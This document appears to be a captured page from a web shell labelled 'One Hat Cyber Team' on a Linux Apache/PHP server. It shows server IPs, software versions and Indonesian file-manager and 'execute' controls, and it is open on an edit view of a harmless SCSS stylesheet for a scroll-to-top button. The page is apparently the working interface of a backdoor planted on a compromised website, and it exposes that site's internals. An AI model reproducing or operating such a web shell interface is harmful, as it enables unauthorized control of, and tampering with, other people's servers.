One Hat Cyber Team
Your IP :
172.71.255.82
Server IP :
188.114.96.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
theme
/
dev
/
components
/
to-top
/
Edit File:
to-top.scss
@import "../bootstrap/scss/functions"; @import "../base/functions"; @import "../base/variables"; @import "../bootstrap/scss/variables"; .to-top { position: fixed; bottom: 5vh; right: 5vw; transform: scale(0); display: flex; align-items: center; justify-content: center; width: 50px; height: 50px; font-size: px-to-rem( 30px ); border-radius: $btn-border-radius; box-shadow: $btn-box-shadow; opacity: 0; background: $primary; color: $white; will-change: transform; z-index: 10; transition: .2s; &.show { transform: scale(1); opacity: 1; transition: all .2s, transform .2s cubic-bezier(0.5, 0, 1, 2); } &.active, &:hover { background: $dark; cursor: pointer; } }
Simpan